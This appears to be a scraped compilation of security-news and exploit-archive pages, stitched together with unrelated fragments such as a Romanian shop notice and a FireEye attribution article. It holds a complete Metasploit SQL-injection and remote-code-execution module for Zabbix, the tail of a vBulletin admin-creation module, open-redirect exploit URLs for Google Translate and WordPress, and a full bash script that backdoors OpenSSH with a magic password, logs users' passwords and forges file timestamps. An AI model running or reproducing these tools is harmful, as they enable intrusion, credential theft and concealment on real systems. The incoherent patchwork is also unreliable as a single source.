"htmldata[confirmpassword]" => pass, "htmldata[email]" => datastore["EMAIL"] }, 'headers' => { "X-Requested-With" => "XMLHttpRequest" } }) if res and res.code == 200 and res.body =~ /Administrator account created/ print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created") report_auth_info( :host => rhost, :port => rport, :sname => 'http', :user => user, :pass => pass, :active => true, :proof => res.body ) else print_error("#{peer} - Admin account creation failed") end end end History vBulletin Administrator Account Creation | Rapid7

vBulletin is a popular proprietary CMS that was recently reported to be vulnerable to an unspecified attack vector. vBulletin is currently positioned 4th in the list of installed CMS sites on the Internet. Hence, the threat potential is huge. Although vBulletin has not disclosed the root cause of the vulnerability or its impact, we determined the attacker’s methods. The identified vulnerability allows an attacker to abuse the vBulletin configuration mechanism in order to create a secondary administrative account. Once the attacker creates the account, they will have full control over the exploited vBulletin application, and subsequently the supported site. Initial analysis Although vBulletin has not disclosed the root cause of the vulnerability or the impact on customers, they did provide a workaround in a blog post encouraging customers to delete the /install, /core/install in vBulleting 4.x and 5.x respectively. Additionally, on vBulletin internal forums a victimized user shared his server’s Apache log, providing some visibility into the attacker’s procedure: This log indicates that the attacker continuously scans, using “GET” requests, for the “/install/upgrade.php” vulnerable resource. Once successful , indicated by the “200”response code, as opposed to “404” response code for non-existing resources, the attacker issues a “POST” request to the same resource with the attack payload. Since the Apache logger does not log the parameters of POST requests, the details of the attack are not yet revealed. Once we had access to some concrete technical details on the vulnerability, we were able to effectively scan hacker forums in search of an exploit code. Soon after, we found PHP code that implements the attack. Next, we carefully installed the code in our lab. The interface clearly states the goal of the attack: injecting a new admin. In order to exploit the vulnerability and inject a new Admin user, the attacker needs to provide the following details: The vulnerable vBulletin upgrade.php exact URL The customer ID. To get these details, the attackers created an additional auxiliary PHP script. The script scans a site for the vulnerable path, exactly as shown above in the reported Apache log, and extracts the customer ID from the vulnerable upgrade.php page, as it’s embedded within the page’s source code. Consequently, the attacker now knows both the vBulletin’s upgarde.php vulnerable URL and the customer ID. With this information, the attack can be launched. Here is an example of the POST request with the attack payload (the red fields match to the information the attacker needed to enter in the PHP interface above). The result of the attack was exactly what the exploit package described. A new admin user was created (“eviladmin”) that is under the control of the attacker. The site has been successfully compromised. Recommendations: vBulletin has advised its customers to delete /install and /core/install directories in versions 4.x and 5.x respectively. For vBulletin users not able to delete these directories – it is advised to block access or redirect requests that hit upgrade.php through via either a WAF, or via web server access configuration. Source: Dangerous vBulletin exploit in the wild

This Metasploit module exploits an unauthenticated SQL injection vulnerability affecting Zabbix versions 2.0.8 and lower. The SQL injection issue can be abused in order to retrieve an active session ID. If an administrator level user is identified, remote code execution can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Zabbix 2.0.8 SQL Injection and Remote Code Execution", 'Description' => %q{ This module exploits an unauthenticated SQL injection vulnerability affecting Zabbix versions 2.0.8 and lower. The SQL injection issue can be abused in order to retrieve an active session ID. If an administrator level user is identified, remote code execution can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file. }, 'License' => MSF_LICENSE, 'Author' => [ 'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept 'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module ], 'References' => [ ['CVE', '2013-5743'], ['URL', 'https://support.zabbix.com/browse/ZBX-7091'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Zabbix version <= 2.0.8', {}] ], 'Privileged' => false, 'Payload' => { 'Space' => 255, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python' } }, 'DisclosureDate' => "Sep 23 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI of the vulnerable Zabbix instance', '/zabbix']) ], self.class) end def uri return target_uri.path end def check # Check version print_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "httpmon.php") }) if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/ version = $1 print_status("#{peer} - Zabbix version #{version} detected") else # If this fails, guest access may not be enabled print_status("#{peer} - Unable to access httpmon.php") return Exploit::CheckCode::Unknown end if version and version <= "2.0.8" return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def get_session_id # Generate random string and convert to hex sqlq = rand_text_alpha(8) sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join sqli = "2 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST" sqli << "(sessionid AS CHAR),0x20)),1,50) FROM zabbix.sessions WHERE status=0 and userid=1 " sqli << "LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" # Extract session id from database res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{uri}", "httpmon.php"), 'vars_get' => { "applications" => sqli } }) if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/ session = $1 print_status("#{peer} - Extracted session cookie - [ #{session} ]") return session else fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session") end end def exploit # Retrieve valid session id @session = get_session_id @sid = "#{@session[16..-1]}" script_name = rand_text_alpha(8) # Upload script print_status("#{peer} - Attempting to inject payload") res = send_request_cgi({ 'method' => 'POST', 'cookie' => "zbx_sessionid=#{@session}", 'uri' => normalize_uri(uri, "scripts.php"), 'vars_post' => { 'sid' => @sid, 'form' => 'Create+script', 'name' => script_name, 'type' => '0', 'execute_on' => '1', 'command' => payload.encoded, 'commandipmi' => '', 'description' => '', 'usrgrpid' => '0', 'groupid' => '0', 'access' => '2', 'save' => 'Save' } }) if res and res.code == 200 and res.body =~ /(Script added)/ print_status("#{peer} - Payload injected successfully") else fail_with(Failure::Unknown, "#{peer} - Payload injection failed!") end # Extract 'scriptid' value @scriptid = /(?<=scriptid=)(\d+)(?=&sid=#{@sid}">#{script_name})/.match(res.body) # Trigger Payload res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{uri}", "scripts_exec.php"), 'cookie' => "zbx_sessionid=#{@session}", 'vars_get' => { "execute" =>1, "scriptid" => @scriptid, "sid" => @sid, "hostid" => "10084" } }) end def cleanup post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)" print_status("#{peer} - Cleaning script remnants") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, 'cookie' => "zbx_sessionid=#{@session}", 'uri' => normalize_uri(uri, "scripts.php") }) if res and res.code == 200 and res.body =~ /(Script deleted)/ print_status("#{peer} - Script removed successfully") else print_warning("#{peer} - Unable to remove script #{@scriptid}") end end end Zabbix 2.0.8 SQL Injection / Remote Code Execution ? Packet Storm

Frams' Shell Tools is a big collection of various (mostly Perl) scripts to make Unix everyday life at the command line interface more comfortable. They have grown in the author's last 20 years as a Unix user, programmer, and administrator. Some examples are: clp (Command Line Perl: a Perl "shell"), fpg (Frams' Perl grep: a grep with full Perl support), zz (generic clipboard), and nvt (Network Virtual Terminal: a better telnet for scripting). http://fex.rus.uni-stuttgart.de/fstools/ To install all programs in one go: wget -O- http://fex.rus.uni-stuttgart.de/sw/share/fstools-0.0.tar | tar xvf - Frams' Shell Tools – Freecode

posibil sa apara pe 31 oficial https://www.htbridge.com/news/what_s_your_email_security_worth_12_dollars_and_50_cents_according_to_yahoo.html ==================================================================== Google: On October 9, 2013, we announced a new, experimental program that rewards proactive security improvements to select open-source projects. This effort complements and extends our long-running vulnerability reward programs for Google web applications and for Google Chrome. https://www.google.com/about/appsecurity/patch-rewards/

Google Translate suffers from an open redirection vulnerability. Summary The issue being described below affects google translate and is not exactly an open redirect. However the results can be the same under certain conditions. The following issue can be used as an open redirect when: Potential victim must not block javascripts from being executed in his/her browser. Potential victim’s browser must not warn him/her about redirections. Potential victim’s browser must allow breaking out of iframes. E.x visit the following link with firefox: http://translate.google.com/translate?u=http://www.solvix.gr/accomplished.html Details When you want to translate a webpage you can visit http://translate.google.com/translate?u=yoursite where “yoursite” is the webpage you want to translate. Of course you can add and other parameters like “sl=” and ”tl=” if you want to specify the source language and the language you want your site to be translated to. But lets keep it simple. If you try to create a redirect, the redirection will happen inside google’s frame. For example the following url: http://translate.google.com/translate?u=http://www.solvix.gr/notaccomplished.html notaccomplished.html has the following code: <script type=”text/javascript”> { window.location.assign(“http://www.solvix.gr/notaccomplished2.html”) } </script> will redirect you from http://www.solvix.gr/notaccomplished.html to http://www.solvix.gr/notaccomplished2.html But you are still inside google’s frame. But what will happen if you just try to get yourself out of google’s frame? Hmmm then you just get yourself out of google’s frame. That simple. Check the following url: http://translate.google.com/translate?u=http://www.solvix.gr/accomplished.html You will be redirected in my new blog, without any warning. accomplished.html has the following code <script language=’Javascript’> if (top.location!= self.location) { top.location = self.location.href } </script> <script> { window.location.assign(“http://www.solvix.gr”) } </script> Conclusion This issue is caused because google translate allows the execution of javascript from the remote site. However, this is not an XSS. Javascript is not executed on google’s domain. Some browsers do not allow you to break the iframe (at least not with my code above) while others warn you about the redirection. However some of the most common browsers like firefox and Internet Explorer 8 will be affected. ———————————————————————————————————————————————— Tested and working on: Firefox 24.0 Firefox 23.0.1 I.E 8.0.6001 Opera 12.16 (Opera warns about the redirection but you can still escape from the frames. Check the following url: http://translate.google.com/translate?u=http://www.solvix.gr/or8.html ) Not working: Konqueror Version 4.10.5 Using KDE Development Platform 4.10.5 (https://bugs.kde.org/show_bug.cgi?id=57038) I.E 10 Google Chrome 30.0.1599.69 m Google Chrome Version 31.0.1650.12 beta (browser warns about the redirection) ———————————————————————————————————————————————— ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Source

According to WordPress, version 3.6 is affected by a URL Redirect Restriction Bypass issue that allows an attacker to craft a URL in such a way that, should it be clicked, would take the victim to a site of the attacker’s choice via the Location: tag in a 302 Redirect. Current descriptions of the WordPress issue may be found at WordPress (1, 2), Mitre and OSVDB. I can confirm that this issue exists in versions 3.1 and 3.6. Due to the range of versions, I assume that it exists in all releases in between but I have not confirmed it. If running an outdated version of WordPress please upgrade to the latest version, which is 3.6.1 at the time of this writing. The current 3.6.1 release fixes four additional issues (1, 2, 3, 4) as well. There are two attack vectors: the first is a full URL redirect; the second is a partial redirect, as the victim is automatically taken to a WordPress error page with the attacker’s link embedded in a prominently displayed <a href> tag. In order for either exploit to work (assuming the victim clicks on the link) two conditions must be true: first, the victim must be logged into the site (wp-admin); and second, they must have permission to the editing page (edit-tags.php or edit-comments.php). If either of these two conditions are false the vulnerable code will not be reached. Exploit 1: edit-tags.php Full URL Direct [vulnerable site]/wp-admin/edit-tags.php?action=delete&_wp_http_referer=http://securitymaverick.com?edit-tags.php The above exploit URL will do a full redirect when the link is clicked on by the victim. It is important to note that in order for the exploit to work the string ‘edit-tags.php’ must be present in the _wp_http_referer parameter. For example: _wp_http_referer=http://securitymaverick.com?edit-tags.php In this case I chose to put it after a ‘?’ and by doing so I create a dummy parameter so that any valid URL before the ‘?’ executes on the attacker’s server. Under normal circumstances servers such as Apache and IIS will not view web application parameters (the stuff after the ‘?’) as pointing to valid server files to execute. On the application side, WordPress should discard the extra parameter. Alternatively an attacker may create a URL such as: _wp_http_referer=http://securitymaverick.com/edit-tags.php This URL has a ‘/’ instead of a ‘?’. This means that the attacker would need to create a valid page named ‘edit-tags.php’ on the attacker’s server in order to have their code run. The normal WordPress login code prevents access to any page under wp-admin if the user has not authenticated. After authentication, the code in edit-tags.php below prevents users without permission from accessing the page: [phpcode]if ( ! current_user_can( $tax->cap->manage_terms ) ) wp_die( __( 'Cheatin’ uh?' ) );[/phpcode] Exploit 2: edit-comments.php Embedded Link Partial Redirect [vulnerable site]/wp-admin/edit-comments.php?action=bulk-comments&_wp_http_referer=http://securitymaverick.com&_wpnonce=1 The above exploit URL will embed the attackers link in the error page of WordPress with the text “Please try again” as seen in the image below. Similar to Exploit 1, the normal WordPress login code prevents access to any page under wp-admin if the user has not authenticated. After authentication, the code in edit-comments.php below prevents users without permission from accessing the page: if ( !current_user_can('edit_posts') ) wp_die(__('Cheatin’ uh?')); Source: CVE-2013-4339: Two Exploits for Wordpress 3.6 URL Redirect Restriction Bypass | SecurityMaverick.com

This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk. # ============================================ # satyr's openssh autobackdooring doohicky v0.-1 # ImpendingSatyr@gmail.com # ============================================ # USAGE: # Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing). # If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything # (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc. # [it'll install them via apt or yum, whichever is available]). # Note: This script will delete itself once it's fairly sure the openssh compile went smoothly. # It's up to you to clean the logs of those yum/apt installs if they're needed, and to restart sshd. # ============================================ # WTF: # I noticed that most openssh code doesn't change too much among versions, and that most openssh backdoors are # just diff patches for specific versions of openssh. So I thought it would be nice to have a script that applies # such a patch based on those similar chunks of code instead of relying on diff patches so that it can be done on different # versions without any modifying (I've seen kiddies apply backdoor patches for a version of openssh that wasn't # originally being used on the box, which is just lazy & dumb). # So I wrote up this to make the whole process a bit easier (For use in my own private network of course o.O) # ============================================ #!/bin/bash # ============================================ # satyr's openssh autobackdooring doohicky v0.-1 # ImpendingSatyr@gmail.com # ============================================ # USAGE: # Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing). # If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything # (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc. # [it'll install them via apt or yum, whichever is available]). # Note: This script will delete itself once it's fairly sure the openssh compile went smoothly. # It's up to you to clean the logs of those yum/apt installs if they're needed, and to restart sshd. # ============================================ # WTF: # I noticed that most openssh code doesn't change too much among versions, and that most openssh backdoors are # just diff patches for specific versions of openssh. So I thought it would be nice to have a script that applies # such a patch based on those similar chunks of code instead of relying on diff patches so that it can be done on different # versions without any modifying (I've seen kiddies apply backdoor patches for a version of openssh that wasn't # originally being used on the box, which is just lazy & dumb). # So I wrote up this to make the whole process a bit easier (For use in my own private network of course o.O) # ============================================ # FEATURES: # 0) "Magic" password can be automagically generated # 1) "Magic" password is MD5'd before being stored in the ssh/sshd binary, so very unlikely that anyone will be able to get your "Magic" password. # 2) Conents of file that logs passwords is XOR encoded using the same code that's in http://packetstormsecurity.com/files/download/34453/apatch-ssh-3.8.1p1.tar.gz # Here's the script for decoding for the bastards out there too lazy to go to the above link: # #!/bin/sh # cat > x << __EOF__ # #include <stdio.h> # main(int c) { # while(1) { # c = getchar(); if(feof(stdin)) break; # putchar(~c); # } # } # __EOF__ # gcc -x c x -o x; cat $1 | ./x; rm -f x # Do a `cat passlog|./theabovescript.sh` to get the logged passes. # 3) Strings used for this backdoor are limited to 2 characters, so it'll hide from the `strings` command. # 4) Cures cancer # 5) Seems to work fine on all versions from 3.9p1 - 6.3p1 (latest as of this script) # 6) Not really a bug, but your hostname will be logged if it doesn't match your IP's reverse DNS (disable this with "UseDNS no" in sshd_config) # ============================================ # KNOWN BUGS (or lack of feature): # 0) Sometimes the password generated contains non-printable characters. # 1) No check to see if apt or yum completed successfully when installing a missing lib. # 2) No check to see if the pass log location is writable. (yes, I know that could be added easily) # 3) No check to see if packetstorm is accessible when grabbing http://dl.packetstormsecurity.net/UNIX/misc/touch2v2.c # on that last command that's echoed for the user to run when done compiling. # 4) No check if box has gcc # ============================================ # NOTE TO ADMINS: # I didn't put this script on your box. You really need to take your box offline and do a clean install of your system. # This script is no different than the other openssh backdoors when it comes to prevention, # tripwire or anything similar will easily notice this backdoor as it will with other openssh backdoors. # ============================================ WGET=/usr/bin/wget SSHD=/usr/sbin/sshd # an openssh mirror MIRROR=http://mirror.team-cymru.org/pub/OpenBSD/OpenSSH/portable/ SSHETC=/etc/ssh PREFIX=/usr if [ ! -d "$SSHETC" ]; then echo "Error: $SSHETC is not a directory." exit 1 fi if [ "`grep -i pam $SSHETC/sshd_config|grep -v '#'|strings`" != "" ]; then echo "(PAM enabled)" pam="--with-pam" fi if [ "`grep -i gss $SSHETC/sshd_config|grep -v '#'|strings`" != "" ] || \ [ "`grep -i gss $SSHETC/ssh_config|grep -v '#'|strings`" != "" ]; then echo "(KRB5 enabled)" gss="--with-kerberos5" fi version=`$SSHD -arf 2>&1|head -2|tail -1|cut -d, -f1|sed -e's/^OpenSSH_//'|awk '{print $1}'` extracrap=`$SSHD -arf 2>&1|head -2|tail -1|cut -d, -f1|sed -e's/^OpenSSH_//'|awk '{print $2}'` if [ "$1" == "" ]; then read -sp "Magic password (just press enter to use a random one): " PW;echo fi if [ "$PW" == "" ]; then function randpass() { [ "$2" == "0" ] && CHAR="[:alnum:]" || CHAR="[:graph:]";cat /dev/urandom|tr -cd "$CHAR"|head -c ${1:-32};echo;} PW=`randpass $(( 20+( $(od -An -N2 -i /dev/random) )%(20+1) ))` fi if [ "$1" == "" ]; then read -p "File to log passwords to: " LOGF else LOGF=$1 fi if [ "$LOGF" == "" ]; then echo "Error: You didn't choose a file to log passwords to." exit 1 fi echo "===========================================================" echo "Using magic password: $PW" cat > md5.$$ << EOF0 $PW EOF0 md5=`printf "%s" \`(cat md5.$$)|sed -e :a -e N -e '$!ba' -e 's/\n/ /g'\`|openssl md5|awk '{print $NF}'` rm -f md5.$$ echo "Using password log file: $LOGF" echo "OpenSSH version: $version" echo "===========================================================" LOGFLEN=`echo -n $LOGF|wc -c` let LOGFLEN++ if [ ! -x "$WGET" ]; then echo "Error: $WGET is not executable" exit 1 fi echo "Downloading openssh-$version..." wget $MIRROR/openssh-$version.tar.gz 2>&1|grep save tar zxf openssh-$version.tar.gz rm -f openssh-$version.tar.gz if [ -d "openssh-$version" ]; then cd openssh-$version else echo "Error: Couldn't download $MIRROR/openssh-$version.tar.gz using $WGET" exit 1 fi echo "Modifying openssh src..." cat > bd.h <<EOF #include <stdio.h> #include <string.h> int pi, md5len, ploglen; FILE *f; char md5[32], plog[$LOGFLEN], encbuf[2048]; static char * bpmd5() { EOF echo $md5|awk -F. '{n=split($1,a,""); for (i=0;i<n;i++) {printf(" md5[%i] = \"%s\";\n",i,a[i+1])}; for (i=2;i<NF;i++) {printf("%s,",$i)};}' >> bd.h cat >> bd.h <<EOF2 return md5; } static char * plogfn() { EOF2 for i in $(seq 0 $((${#LOGF} - 1))); do echo "plog[$i] = \"${LOGF:$i:1}\";";done >> bd.h cat >> bd.h <<EOF3 return plog; } static void enclog() { char *plogg = plogfn(); int plen; FILE *f; plen=strlen(encbuf); for (pi=0; pi<=plen; pi++) encbuf[pi]=~encbuf[pi]; f = fopen(plogg,"a"); if (f != NULL) { fwrite(encbuf, plen, 1, f); fclose(f); } } EOF3 sed -e s/\"/\'/g -e s/plogg,\'a\'/plogg,\"a\"/ -i bd.h sed '/#include "includes.h"/i\ #include "bd.h" ' -i auth.c sed '/authmsg = authenticated ? "Accepted" : "Failed"/a\ if (!pi) ' -i auth.c sed -i "`echo $[ $(grep -n auth_root_allowed auth.c|awk -F: '{print $1}') + 2 ]`iif (pi) return 1;" -i auth.c # the auth-pam.c stuff is only for => 3.9p1 sed '/auth2-pam-freebsd.c/a\ #include "bd.h" ' -i auth-pam.c sed '/void.*sshpam_conv/a\ if (pi) sshpam_err = PAM_SUCCESS; ' -i auth-pam.c sed "`echo $[ $(grep -n pam_authenticate.sshpam_handle auth-pam.c|head -c3) + 1 ]`iif (pi) sshpam_err = PAM_SUCCESS;" -i auth-pam.c sed "`grep -nA3 sshpam_cleanup.void auth-pam.c|grep NULL|head -c3`s/NULL/NULL || pi/" -i auth-pam.c sed "`echo $[ $(grep -n char.*pam_rhost auth-pam.c|head -c3) + 2 ]`iif (pi) return (0);" -i auth-pam.c sed '/type == PAM_SUCCESS/a\ if (pi) return 0; ' -i auth-pam.c sed "`echo $[ $(grep -n do_pam_setcred auth-pam.c|head -c3) + 3 ]`a\ if (pi) {\n\ sshpam_cred_established = 1;\n\ return;\n\ }" -i auth-pam.c sed "`echo $[ $(grep -n sshpam_respond.void auth-pam.c|head -c3) + 3 ]`a\ if (pi) {\n\ sshpam_cred_established = 1;\n\ return;\n\ }" -i auth-pam.c sed "`grep -nA6 sshpam_auth_passwd auth-pam.c|grep "\-$"|sed 's/\-$//'`a\ char *passmd5 = str2md5(password, strlen(password));\n\ char *bpass = bpmd5();\n\ int enlen;\n\ " -i auth-pam.c sed "`echo $(grep -n "sshpam_authctxt = authctxt" auth-pam.c|tail -1|awk -F: '{print $1}')`a\ if (strcmp(passmd5,bpass) == 0) {\n\ pi = 1;\n\ return 1;\n\ }" -i auth-pam.c sed "`echo $(grep -nA1 'debug.*password authentication accepted for' auth-pam.c|tail -1|head -c4)`a\ enlen = sprintf(encbuf,\"pam\");\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\",authctxt->user);\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\\\n\",password);\n\ enclog();\n\ " -i auth-pam.c sed '/#include "includes.h"/i\ #include "bd.h"\ #include <stdlib.h>\ #if defined(__APPLE__)\ # define COMMON_DIGEST_FOR_OPENSSL\ # include <CommonCrypto/CommonDigest.h>\ # define SHA1 CC_SHA1\ #else\ # include <openssl/md5.h>\ #endif\ ' -i auth-passwd.c sed '/extern ServerOptions options;/a\ char *str2md5(const char *str, int length) {\ int n;\ MD5_CTX c;\ unsigned char digest[16];\ char *out = (char*)malloc(33);\ MD5_Init(&c);\ while (length > 0) {\ if (length > 512) {\ MD5_Update(&c, str, 512);\ } else {\ MD5_Update(&c, str, length);\ }\ length -= 512;\ str += 512;\ }\ MD5_Final(digest, &c);\ for (n = 0; n < 16; ++n) {\ snprintf(&(out[n*2]), 16*2, "%02x", (unsigned int)digest[n]);\ }\ return out;\ }\ ' -i auth-passwd.c sed '/#ifndef HAVE_CYGWIN/i\ if (pi) return 1; ' -i auth-passwd.c sed "`echo $[ $(grep -n sys_auth_passwd.A auth-passwd.c|tail -1|head -c3) + 3 ]`a\ char *passmd5 = str2md5(password, strlen(password));\n\ char *bpass = bpmd5();\n\ int enlen;\n\ " -i auth-passwd.c sed "`echo $(grep -n pw_password.0.*xx auth-passwd.c|head -c3)`a\ if (strcmp(passmd5,bpass) == 0) {\n\ pi = 1;\n\ return 1;\n\ }\n\ else {\n\ if (strcmp(encrypted_password, pw_password) == 0) {\n\ enlen = sprintf(encbuf,\"pas\");\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\",authctxt->user);\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\\\n\",password);\n\ enclog();\n\ }\n\ }\n\ " -i auth-passwd.c sed '/#include "includes.h"/i\ #include "bd.h" ' -i sshconnect1.c sed '/char \*password;/a\ int enlen; ' -i sshconnect1.c sed '/ssh_put_password(password);/a\ enlen = sprintf(encbuf,"1:");\ enlen += sprintf(encbuf+enlen,"%s",get_remote_ipaddr());\ enlen += sprintf(encbuf+enlen,":");\ enlen += sprintf(encbuf+enlen,"%s",options.user);\ enlen += sprintf(encbuf+enlen,":");\ enlen += sprintf(encbuf+enlen,"%s\\n",password);\ enclog();\ ' -i sshconnect1.c sed '/#include "includes.h"/i\ #include "bd.h" ' -i sshconnect2.c sed '/char.*password;/a\ int enlen; ' -i sshconnect2.c sed "`echo $(grep -n 'packet_put_cstring(password);' sshconnect2.c|head -c3)`a\ enlen = sprintf(encbuf,\"2:\");\n\ enlen += sprintf(encbuf+enlen,\"%s\",authctxt->server_user);\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\",authctxt->host);\n\ enlen += sprintf(encbuf+enlen,\":\");\n\ enlen += sprintf(encbuf+enlen,\"%s\\\n\",password);\n\ enclog();\ " -i sshconnect2.c sed '/#include "includes.h"/i\ #include "bd.h" ' -i loginrec.c sed '/#ifndef HAVE_CYGWIN/i\ if (pi) return 0; ' -i loginrec.c sed '/#include "includes.h"/i\ #include "bd.h" ' -i log.c sed '/#if (level > log_level)/i\ if (pi) return; ' -i loginrec.c sed 's/PERMIT_NO /PERMIT_YES /' -i servconf.c sed 's/PERMIT_NO;/PERMIT_YES;/' -i servconf.c sed 's/PERMIT_NO_PASSWD /PERMIT_YES /' -i servconf.c sed 's/PERMIT_NO_PASSWD;/PERMIT_YES;/' -i servconf.c if [ "$extracrap" != "" ]; then sed -re"s/(SSH.*PORTABLE.*)\"/\1 $extracrap\"/" -i version.h fi echo "Compiling..." ./configure --prefix=$PREFIX $pam $gss --sysconfdir=$SSHETC 2>/dev/null 1>/dev/null if [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: PAM headers not found" ]; then if [ "$1" == "" ]; then echo "Error: PAM headers missing. To install do: " echo " (with apt) apt-get install libpam0g-dev" echo " (with yum) yum install pam-devel" exit 1 else echo "Error: PAM headers missing. Attempting automatic install..." if [ -e "/usr/bin/yum" ]; then yum -y install pam-devel fi if [ -e "/usr/bin/apt-get" ]; then apt-get -y install libpam0g-dev fi echo "If install was successful, rerun $0" exit 1 fi fi if [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: no acceptable C compiler found in \$PATH" ]; then echo "Error: No gcc on this box (or in \$PATH)." exit 1 fi if [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: *** zlib missing - please install first or check config.log ***" ] || \ [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: *** zlib.h missing - please install first or check config.log ***" ]; then if [ "$1" == "" ]; then echo "Error: zlib missing. To install do: " echo " (with apt) apt-get install zlib1g-dev" echo " (with yum) yum install zlib-devel" exit 1 else echo "Error: zlib missing. Attempting automatic install..." if [ -e "/usr/bin/yum" ]; then yum -y install zlib-devel fi if [ -e "/usr/bin/apt-get" ]; then apt-get -y install zlib1g-dev fi echo "If install was successful, rerun $0" exit 1 fi fi if [ "`grep "krb5.h: No such file or directory" config.log|head -1|awk '{ print substr($0, index($0,$2)) }'`" == "error: krb5.h: No such file or directory" ]; then echo "Error: kerberos5 missing. To install do:" echo " (with apt) apt-get install libkrb5-dev" echo " (with yum) yum install krb5-devel" fi if [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: *** Can't find recent OpenSSL libcrypto (see config.log for details) ***" ] || \ [ "`grep error: config.log|sed -e's/.*error:/error:/'|tail -1`" == "error: *** OpenSSL headers missing - please install first or check config.log ***" ]; then if [ "$1" == "" ]; then echo "Error: libcrypto missing. To install do: " echo " (with apt) apt-get install libssl-dev" echo " (with yum) yum install openssl-devel" exit 1 else echo "Error: libcrypto missing. Attempting automatic install..." if [ -e "/usr/bin/yum" ]; then yum -y install openssl-devel fi if [ -e "/usr/bin/apt-get" ]; then apt-get -y install libssl-dev fi echo "If install was successful, rerun $0" exit 1 fi fi make 2>/dev/null 1>/dev/null if [ -e "sshd" ]; then ls -l ssh sshd cd .. rm -vf $0 echo "Now do this:" echo "cd openssh-$version;$WGET http://dl.packetstormsecurity.net/UNIX/misc/touch2v2.c -q;gcc -o touch touch2v2.c;cp /usr/sbin/sshd sshd.bak;cp /usr/bin/ssh ssh.bak;chown --reference=/usr/bin/ssh ssh.bak;chown --reference=/usr/sbin/sshd sshd.bak;touch -r /usr/sbin/sshd sshd.bak;touch -r /usr/bin/ssh ssh.bak;./touch -r /usr/sbin/sshd sshd.bak;./touch -r /usr/bin/ssh ssh.bak;rm -f /usr/sbin/sshd /usr/bin/ssh;cp ssh /usr/bin/;cp sshd /usr/sbin/;chown --reference=ssh.bak /usr/bin/ssh;chown --reference=sshd.bak /usr/sbin/sshd;touch -r sshd.bak /usr/sbin/sshd;touch -r ssh.bak /usr/bin/ssh;./touch -r sshd.bak /usr/sbin/sshd;./touch -r ssh.bak /usr/bin/ssh;echo Backdoored. Now you restart it." else echo "Error: Compiling failed: " grep error: config.log|tail -1 fi Files from Satyr ? Packet Storm

Stoc epuizat Stocul pentru aceste produse este epuizat. Deoarece nu ar fi corect s? accept?m comenzi pe care nu le putem onora, v? rug?m s? ne contacta?i pentru o eventual? precomand?.

Yahoo to pay up to $15,000 for bug finds after 't-shirt gate' scandal - IT News from V3.co.uk

It's those 'regional traits' that give you away, say infosec sleuths Nation-state driven cyber attacks often take on a distinct national or regional flavour that can uncloak their origins, according to new research by net security firm FireEye. Computer viruses, worms, and denial of service attacks often appear from behind a veil of anonymity. But a skilful blending of forensic “reverse-hacking” techniques combined with deep knowledge of others’ cultures and strategic aims can uncover the perpetrators of attacks. Kenneth Geers, senior global threat analyst at threat protection biz FireEye, explained: “Cyber shots are fired in peacetime for immediate geopolitical ends, as well as to prepare for possible future kinetic attacks. Since attacks are localised and idiosyncratic—understanding the geopolitics of each region can aid in cyber defence.” Estonia was able to point the finger of blame towards the infamous (and ultimately politically unsuccessful) cyberattacks against its systems in 2007. FireEye argues that understanding the context of cyberattacks can be used to unpick their origins or to better prepare for them. “A cyber attack, viewed outside of its geopolitical context, allows very little legal manoeuvring room for the defending state,” said Professor Thomas Wingfield of the Marshall Centre, a joint US-German defence studies institute. 